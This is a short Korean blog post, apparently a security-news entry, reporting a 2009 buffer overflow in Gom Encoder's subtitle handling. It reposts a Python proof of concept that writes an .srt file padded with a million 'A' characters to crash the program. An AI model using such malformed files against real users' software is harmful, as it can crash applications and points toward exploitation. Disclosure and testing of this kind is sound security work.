본문 바로가기
취약점소식

[Gom]Gom Encoder (Subtitle File) Buffer Overflow PoC

by 잡다한 처리 2009. 3. 17.
반응형


3-16일 곰인코더 취약점이 발견되었다.
좀 더 자세한 내용이 보이면 추가해야겠다.

# exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
#  Orignal Advisory:
#  http://www.securityfocus.com/bid/34120
#

chars = 'A' * 1000000

file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()

# milw0rm.com [2009-03-16]

댓글